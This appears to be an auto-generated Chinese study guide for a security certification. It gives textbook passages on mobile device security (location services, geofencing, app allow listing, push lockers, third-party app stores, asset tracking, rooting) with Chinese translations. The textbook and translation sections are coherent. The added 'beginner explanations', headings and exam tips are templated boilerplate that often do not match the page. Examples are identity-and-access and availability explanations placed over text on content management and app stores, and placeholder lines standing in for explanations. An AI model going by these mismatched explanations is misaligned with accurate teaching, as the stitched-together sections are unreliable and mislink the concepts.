地理标记可能被用于恶意目的,例如确定一个人通常执行日常活动的时间。 一旦带有地理标记的照片上传到互联网,潜在的网络跟踪者可能获得比上传 者预期更多的信息。 这是面向终端用户的安全部署简报的绝佳素材。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 75 / PDF P618

第 618 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Other Location Services The most commonly discussed location service of a mobile device is that of GPS. However, it is important to recognize that there are at numerous location determination services or capabilities in many mobile devices. These include wireless positioning system (WiPS) or Wi-Fi positioning system (WFPS), cellular/mobile service tower triangulation, Bluetooth location services, and environmental sensors. WiPS uses the known location of wireless access points/base stations to determine a mobile device's location. WiPS is often used as a supplement to GPS when sufficient satellite signals are unavailable, such as when underground, inside buildings, or near tall structures.

Due to U.S. 911 regulations (which established E911), mobile devices can be located using mobile service tower triangulation. However, E911 location tracking is not as accurate as GPS. iBeacon is a technology developed by Apple to track devices based on their Bluetooth device address and signal properties. Though originally designed to track people inside Apple stores, it is now used in many other contexts by a wide range of organizations to track devices via Bluetooth and their related user/owner. Environmental sensors on many mobile devices include accelerometers, compasses, thermometers, altimeters (altitude sensors), and barometric pressure sensors.

With this vast range of sensing data, if the initial location of a device is known or can be approximated, then its location at any future point in time can be determined if continuous sensor data is recorded. It is also possible for a device to be located through its camera and microphones, but so far, this method is not as reliable as the others. This final concept measures light levels, intensity, and color to potentially determine if a device is outside or inside and if it is located near a window, which, based on the time of day, may be able to determine the general area (such as a city) based on light levels caused by the sun's position in the sky.

This can then be combined with monitoring of background noise via the microphone to further refine the location. But this requires extensive knowledge of regional sounds, a massive dataset

中文直译 / 整理

其他位置服务 移动设备最常被讨论的位置服务是GPS。 然而,重要的是要认识到,许多 移动设备中存在多种位置确定服务或功能。 这些包括无线定位系统( WiPS)或Wi-Fi定位系统(WFPS)、蜂窝/移动服务塔三角测量、蓝牙位 置服务和环境传感器。 WiPS 利用无线接入点/基站的已知位置来确定移动设备的位置。 当无法获 得足够的卫星信号(例如在地下、建筑物内或靠近高大结构时),WiPS 常被用作 GPS 的补充。 由于美国 911 法规(制定了 E911),移动设备可以通过移动服务基站的 三角定位进行定位。 然而,E911 定位跟踪的精度不如 GPS。 iBeacon 是苹果公司开发的一种技术,用于根据设备的蓝牙地址和信号特 性进行追踪。 虽然最初设计用于追踪苹果商店内的人员,但现在已被众多 组织广泛用于通过蓝牙及其相关用户/所有者追踪设备。 许多移动设备上的环境传感器包括加速度计、指南针、温度计、高度计 (高度传感器)和气压传感器。 如果已知或可近似估计设备的初始位置, 且持续记录传感器数据,则可确定设备在任何未来时间点的位置。 设备还可以通过其摄像头和麦克风进行定位,但迄今为止,这种方法不如 其他方法可靠。

这一最终概念通过测量光照水平、强度和颜色,以潜在判 断设备位于室外还是室内,以及是否靠近窗户; 根据一天中的时间,结合 由太阳在天空中位置引起的光照水平,可能确定大致区域(例如城市)。 然后,可以结合通过麦克风监测背景噪音,进一步精确定位。 但这需要对 区域声音有深入的了解,以及庞大的数据集

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

指南:指南是建议做法,不一定强制。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 618 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Recommended、not compulsory 常对应 guideline。

网络题先定位层次,再判断协议、设备或攻击位置。

IPS 放在线路中,误报可能影响可用性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
指南 指南是建议做法,不一定强制。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 76 / PDF P619

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

of noise from across the globe, or access to real-time microphone networks or sensors. Geofencing is the designation of a specific geographical area that is then used to implement features or trigger settings automatically on mobile devices. A geofence can be defined by GPS coordinates, WiPS, or the presence of or lack of a specific wireless signal. A device can be configured to enable or deactivate features based on a geofenced area, such as an onboard camera or the Wi-Fi capability. Content Management Content management is the control over mobile devices and their access to content hosted on company systems as well as the control of access to company data stored on mobile devices.

Typically, an MCM (mobile content management) system is used to control company resources and the means by which they are accessed or used on mobile devices. An MCM can take into account a device's capabilities, storage availability, screen size, bandwidth limitations, memory (RAM), and processor capabilities when rendering or sending data to mobile devices. The goal of a content management system (CMS) for mobile devices is to maximize performance and work benefits while reducing complexity, confusion, and inconvenience. An MCM may also be tied to an MDM to ensure secure use of company data.

A content filter, which may block access to resources, data, or services based on IP address, domain name, protocol, or keyword, is often implemented as a firewall service rather than an on-device mechanism. Therefore, content filtering is usually enforced by the network through which communication occurs. Application Control Application control or application management is a device-management solution that limits which applications can be installed onto a device. It can also be used to force specific applications to be installed or to enforce the settings of certain applications to support a security baseline or maintain other forms of compliance.

Using application control can often reduce exposure to malicious applications by limiting the user's ability to install apps that come from unknown sources or that offer non-work-related features.

中文直译 / 整理

全球范围内的噪音数据,或实时麦克风网络或传感器的访问权限。 地理围栏是指指定一个特定的地理区域,然后用于在移动设备上自动实施功能 或触发设置。 地理围栏可以通过GPS坐标、WiPS或特定无线信号的存在或缺失 来定义。 设备可以根据地理围栏区域配置以启用或停用功能,例如车载摄像头 或Wi‑Fi功能。 内容管理 内容管理是指对移动设备及其对公司系统上托管内容的访问进行控制,以及对 存储在移动设备上的公司数据的访问进行控制。 通常,使用MCM(移动内容管 理)系统来控制公司资源以及这些资源在移动设备上的访问或使用方式。 当向 移动设备呈现或发送数据时,MCM可以考虑设备的性能、存储可用性、屏幕尺 寸、带宽限制、内存(RAM)和处理器能力。 移动设备的内容管理系统(CMS)的目标是最大化性能和工作效率,同时 降低复杂性、混淆和不便。 MCM也可能与MDM关联,以确保公司数据的 安全使用。 内容过滤器通常作为防火墙服务实现,而非设备本地机制,它可能根据IP地址、 域名、协议或关键词阻止对资源、数据或服务的访问。 因此,内容过滤通常通 过通信所经过的网络来强制执行。

应用控制 应用控制或应用管理是一种设备管理解决方案,用于限制可以安装到设备上的 应用程序。 它还可以用于强制安装特定应用程序,或强制执行某些应用程序的 设置,以支持安全基线或维持其他形式的合规性。 使用应用控制通常可以通过 限制用户安装来自未知来源或提供非工作相关功能的应用程序,来降低恶意应 用程序的暴露风险。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 77 / PDF P620

第 620 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

This mechanism is often implemented by an MDM. Without application control, users could theoretically install malicious code, run data stealing software, operate apps that reveal location data, or not install businessnecessary applications. Application allow listing (also known as whitelisting) is a security option that prohibits unauthorized software from being able to execute. Allow listing is also known as deny by default or implicit deny. In application security, allow listing prevents any and all software, including malware, from executing unless it's on the preapproved exception list: the allow list.

This is a significant departure from the typical device-security stance, which is to allow by default and deny by exception (also known as deny listing or block listing, also known as blacklisting). Deny listing allows anything and everything, both benign and malicious, to execute by default, unless it is added to the deny list, which prevents execution from that point forward. Due to the growth of malware, an application allow listing approach is one of the few options remaining that shows real promise in protecting devices and data. However, no security solution is perfect, including allow listing.

All known allow listing solutions can be circumvented with kernel-level vulnerabilities and application configuration issues. Mobile application management (MAM) is similar to an MDM but focuses only on app management rather than managing the entire mobile device. Push Notifications Push notification services are able to send information to your device rather than having the device (or its apps) pull information from an online resource. Push notifications are useful in being notified about a concern immediately, but they can also be a nuisance if they are advertising or spam. Many apps and services can be configured to use push and/or pull notifications.

Push notifications are mostly a distraction, but it is possible to perform social engineering attacks via these messages as well as distribute malicious code or links to abusive sites and services. Push notifications are also a concern in browsers for both mobile devices and PCs. Another issue is that malicious or pernicious notifications may capture a user in a push locker. If the user denies agreement to a push prompt, it may redirect them to a subdomain where another push notification is displayed. If they deny again, then they are redirected again to yet another subdomain, to then see another push notification. This can be repeated indefinitely. Until

中文直译 / 整理

此机制通常由MDM实现。 如果没有应用控制,用户理论上可以安装恶意 代码、运行数据窃取软件、运行泄露位置信息的应用程序,或不安装业务 必需的应用程序。 应用程序允许列表(也称为白名单)是一种安全选项,可阻止未经授权的软件 执行。 允许列表也称为默认拒绝或隐式拒绝。 在应用程序安全中,允许列表可 防止任何软件(包括恶意软件)执行,除非其位于预先批准的例外列表——即允 许列表中:这是一个 与典型的设备安全立场的重大背离,后者默认允许所有操作,仅对例外情况予 以拒绝(也称为拒绝列表或阻止列表,也称为黑名单)。 拒绝列表默认允许所 有行为——无论是良性还是恶意——执行,除非将其添加到拒绝列表中,此后将 阻止其执行。 由于恶意软件的激增,应用程序允许列表是少数仍具有实际前景、可用于保护 设备和数据的方案之一。 然而,没有任何安全解决方案是完美的,包括允许列 表。 所有已知的允许列表解决方案都可能因内核级漏洞和应用程序配置问题而 被绕过。 移动应用管理(MAM) 与 MDM 类似,但仅专注于应用管理,而非管理整个移 动设备。 推送通知 推送通知 服务能够向您的设备发送信息,而不是由设备(或其应用)从在线资 源中拉取信息。

推送通知在及时获知问题时非常有用,但如果它们是广告或垃 圾信息,也可能成为干扰。 许多应用和服务可以配置为使用推送和/或拉取通知。 推送通知大多是干扰,但攻击者也可能通过这些消息实施社会工程攻击,或分 发恶意代码和指向滥用网站与服务的链接。 推送通知在移动设备和PC的浏览器中也是一个问题。 另一个问题是,恶意或有 害的通知可能会将用户困在推送锁中。 如果用户拒绝了推送提示,它可能会将 他们重定向到一个子域名,在那里显示另一个推送通知。 如果他们再次拒绝, 则会被再次重定向到另一个子域名,以查看另一个推送通知。 这种情况可以无 限重复。 直到

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

程序:程序是一步一步怎么做。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 620 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Step-by-step、SOP 常对应 procedure。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
程序 程序是一步一步怎么做。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 78 / PDF P621

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

your browser and/or host-based intrusion detection system (HIDS) can detect and respond to push lockers, the only response is to close/terminate the browser and not return to the same URL. Third-Party Application Stores The primary, default, and authorized application (aka app) stores of Apple App Store and Google Play Store are the official sources for apps for use on the typical or standard Apple and Android smartphone or device, respectively. Third-party app stores often have less rigorous security rules regarding hosting an app.

On Android devices, simply enabling a single feature to install apps from unknown sources allows the use of third-party app stores (as well as sideloading; see the section “Sideloading,” later in this chapter). For Android devices, the Amazon Appstore is an example of a third-party app store. For Apple iOS devices, currently you are limited to the official Apple App Store unless you jailbreak or root the device (which is not usually a security recommendation). When a mobile device is being managed by an organization, especially when using an MDM/UEM/MAM, most third-party sources of apps will be blocked.

Such third-party app sources represent a significant increase in risk of data leakage or malware intrusion to an organizational network. Storage Segmentation Storage segmentation is used to artificially compartmentalize various types or values of data on a storage medium. On a mobile device, storage segmentation may be used to isolate the device's OS and preinstalled apps from user-installed apps and user data. Some MDMs/UEMs further impose storage segmentation to separate company data and apps from user data and apps.

This allows for ownership and rights over user data to be retained by the user, while granting ownership and rights over business data (such as remote wiping) to the organization, even on devices owned by the employee. With or without storage segmentation, risk can be reduced by minimizing the storage of nonessential data, sensitive data, and personal data (i.e., PII and PHI) on a device. So, even if a device is lost or stolen, the loss potential is kept to a minimum if there is little to no valuable data on the system for an adversary to gain access to. Asset Tracking

中文直译 / 整理

您的浏览器和/或基于主机的入侵检测系统(HIDS)能够检测并响应推送锁 之前,唯一的应对方式是关闭/终止浏览器,且不再返回同一URL。 第三方应用商店 Apple App Store 和 Google Play Store 是苹果和安卓智能手机或设备上应用 的官方、默认和授权的应用商店。 第三方应用商店在托管应用时通常具有较宽 松的安全规则。 在安卓设备上,只需启用一个允许从未知来源安装应用的选项, 即可使用第三方应用商店(以及侧载; 参见本章后面的“侧载”部分)。 对于 安卓设备,Amazon Appstore 是一个第三方应用商店的例子。 对于苹果 iOS 设备,目前您只能使用官方的 Apple App Store,除非您对设备进行越狱或刷 机(这通常不是安全建议)。 当移动设备由组织管理时,尤其是在使用 MDM/UEM/MAM 的情况下,大多 数第三方应用来源将被阻止。 这些第三方应用来源会显著增加组织网络发生数 据泄露或恶意软件入侵的风险。 存储分段 存储分段用于在存储介质上人为地将不同类型或价值的数据进行隔离。 在移动 设备上,存储分段可用于将设备的操作系统和预装应用与用户安装的应用和用 户数据隔离开来。

一些MDM/UEM系统进一步实施存储分段,以将公司数据 和应用与用户数据和应用分离。 这使得用户保留对用户数据的所有权和权利, 同时组织保留对业务数据(如远程擦除)的所有权和权利,即使设备由员工个 人所有。 无论是否使用存储分段,都可以通过最小化在设备上存储非必要数据、敏感数 据和个人数据(即PII和PHI)来降低风险。 因此,即使设备丢失或被盗,如果 系统中几乎没有或完全没有可供攻击者访问的有价值数据,损失潜力也将降至 最低。 资产跟踪

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

标准:标准给出必须满足的最低要求。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

ISO 偏标准和管理体系。

Minimum level、mandatory requirement 常对应 standard。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
标准 标准给出必须满足的最低要求。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 79 / PDF P622

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Asset tracking is the management process used to maintain oversight over an inventory, such as deployed mobile devices. An asset-tracking system can be passive or active. Passive systems rely on the asset itself to check in with the management service on a regular basis, or the device is detected as being present in the office each time the employee arrives at work. An active system uses polling or pushing technology to send out queries to devices to elicit a response. You can use asset tracking to verify that a device is still in the possession of the assigned authorized user. Some asset-tracking solutions can locate missing or stolen devices.

Some asset-tracking solutions expand beyond hardware inventory management and can oversee the installed apps, app usage, stored data, and data access on a device. You can use this type of monitoring to verify compliance with security guidelines or to check for exposure of confidential information to unauthorized entities. Removable Storage Many mobile devices support removable storage. Some devices support microSD cards, which can be used to expand available storage on a mobile device. However, most mobile phones require the removal of a back plate and sometimes removal of the battery to add or remove a storage card.

Larger mobile phones, tablets, and laptop computers may support an easily accessible card slot on the side of the device. Many mobile devices also support external USB storage devices, such as flash drives and external hard drives. Some may require a special on-the-go (OTG) cable. USB On-The-Go (OTG) is a specification that allows a mobile device with a USB port to act as a host and use other standard peripheral USB equipment, such as storage devices, mice, keyboards, and digital cameras. USB OTG is a feature that can be deactivated via MDM/UEM if it is perceived as a risk vector for mobile devices used within an organization.

In addition, mobile storage devices may provide Bluetoothor Wi-Fi-based access to stored data through an onboard wireless interface. Organizations need to consider whether the use of removable storage on portable and mobile devices is a convenient benefit or a significant risk vector. If the former, proper access limitations and use training are necessary. If the latter, then a prohibition of removable storage can be implemented via MDM/UEM.

中文直译 / 整理

资产管理是用于对库存(如已部署的移动设备)进行监督的管理流程。 资产管 理系统的类型可以是被动式或主动式。 被动式系统依赖资产本身定期与管理服 务通信,或在员工每天上班时检测到设备出现在办公室内。 主动式系统则使用 轮询或推送技术向设备发送查询以获取响应。 您可以使用资产跟踪来验证设备是否仍由指定的授权用户持有。 一些资产跟 踪解决方案可以定位丢失或被盗的设备。 一些资产跟踪解决方案超越了硬件资产管理,能够监控设备上安装的应用程 序、应用使用情况、存储的数据以及数据访问情况。 您可以使用这种类型的 监控来验证是否符合安全准则,或检查机密信息是否被未经授权的实体泄露。 可移动存储 许多移动设备支持可移动存储。 一些设备支持microSD卡,可用于扩展移动设 备的可用存储空间。 然而,大多数手机需要拆下后盖,有时还需取出电池才能 添加或移除存储卡。 较大的移动电话、平板电脑和笔记本电脑可能在设备侧面 设有易于访问的卡槽。 许多移动设备还支持外部USB存储设备,例如闪存盘和外部硬盘。 某些设备可 能需要专用的OTG线缆。

USB On-The-Go (OTG)是一种规范,允许具有USB端 口的移动设备充当主机,并使用其他标准外围USB设备,如存储设备、鼠标、 键盘和数码相机。 USB OTG是一种功能,如果在组织内使用的移动设备中被视 为风险向量,可通过MDM/UEM将其停用。 此外,移动存储设备可通过内置的无线接口,通过蓝牙或Wi‑Fi方式访问存储的 数据。 组织需要考虑在便携式和移动设备上使用可移动存储是否是一种便利的益处, 还是一个重大的风险点。 如果是前者,则需要实施适当的访问限制和使用培训; 如果是后者,则可以通过MDM/UEM实施禁止可移动存储。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 80 / PDF P623

第 623 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Deactivating Unused Features Although enabling security features is essential for them to have any beneficial effect, it's just as important to remove apps and deactivate features that aren't essential to business tasks or common personal use. The wider the range of enabled features and installed apps, the greater the chance that an exploitation or software flaw will cause harm to the device and/or the data it contains. Following common security practices, such as hardening, reduces the attack surface of mobile devices.

Rooting or Jailbreaking Rooting or jailbreaking (the special term for rooting Apple devices) is the action of breaking the digital rights management (DRM) security on the bootloader of a mobile device to be able to operate the device with root or full system privileges. Most mobile devices are locked in such a way as to restrict end-user activity to that of a limited user. But a root user can manipulate the OS, enable or deactivate hardware features, and install software applications that are not available to the limited user. Rooting may enable a user to change the core OS or operate apps that are unavailable in the standard app stores. However, this is not without its risks.

Operating in rooted status also reduces security, since any executable also launches with full root privileges. Many forms of malicious code cannot gain footing on normal mode devices but can easily take root (pun intended) when the user has rooted or jailbroken their device. Generally, an organization should prohibit the use of rooted devices on the company network or even access to company resources whenever possible. It is legal to root a device if you fully own the device, if you are in a oneor two-year contract with a hardware fee, or if you are in a lease-to-own contract and you do not fully own the device until that contract is fulfilled.

Legal root does not require a manufacturer, vendor, or telco to honor any warranty. In most cases, any form of system tampering, including rooting, voids your warranty. Rooting may also void your support contract or replacement contract. Rooting is actively suppressed by the telcos, many carriers, and some product vendors, Apple being the main example. A rooted device might be prohibited to operate over a telco network, access resources, download apps, or receive future updates. Thus, though it is often legal to root a device, there are numerous consequences to consider prior to altering a mobile device in that manner.

中文直译 / 整理

停用未使用的功能 尽管启用安全功能对于发挥其有益作用至关重要,但移除非业务任务或常见个 人使用所必需的应用程序并停用相关功能同样重要。 启用的功能和安装的应用 程序范围越广,利用漏洞或软件缺陷对设备和/或其中数据造成损害的可能性就 越大。 遵循常见的安全实践(如加固)可以减少移动设备的攻击面。 获取Root权限或越狱 获取Root权限或越狱(针对苹果设备的专用术语)是指突破移动设备引导加载 程序的数字版权管理(DRM)安全机制,以获得Root权限或完整系统权限的 操作。 大多数移动设备都被锁定,仅允许最终用户进行有限的操作。 但Root用 户可以操纵操作系统、启用或停用硬件功能,并安装受限用户无法安装的软件 应用程序。 获取Root权限可能使用户能够更改核心操作系统或运行标准应用商 店中不可用的应用程序。 然而,这并非没有风险。 在Root状态下运行也会降低 安全性,因为任何可执行文件都会以完整的Root权限启动。 许多恶意代码在普 通模式设备上无法立足,但一旦用户对设备进行了Root或越狱,这些代码就很 容易植入(双关语)。 通常,组织应尽可能禁止在公司网络上使用已获取Root权限的设备,甚至禁止 访问公司资源。

如果您完全拥有该设备,或与硬件费用相关的合同期为一至两年,或您处于租 购合同中且在合同履行完毕前并未完全拥有该设备,则对设备进行root操作是 合法的。 合法的root操作不要求制造商、供应商或电信运营商履行任何保修义 务。 在大多数情况下,任何形式的系统篡改,包括root操作,都会使您的保修 失效。 root操作还可能使您的支持合同或更换合同失效。 电信运营商、许多运 营商和一些产品供应商积极阻止root操作,苹果公司是主要的例子。 被root的 设备可能被禁止在电信网络上运行、访问资源、下载应用程序或接收未来更新。 因此,尽管对设备进行root操作通常是合法的,但在以这种方式修改移动设备 之前,仍需考虑诸多后果。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 623 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

检测是 IDS,主动阻断更像 IPS。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
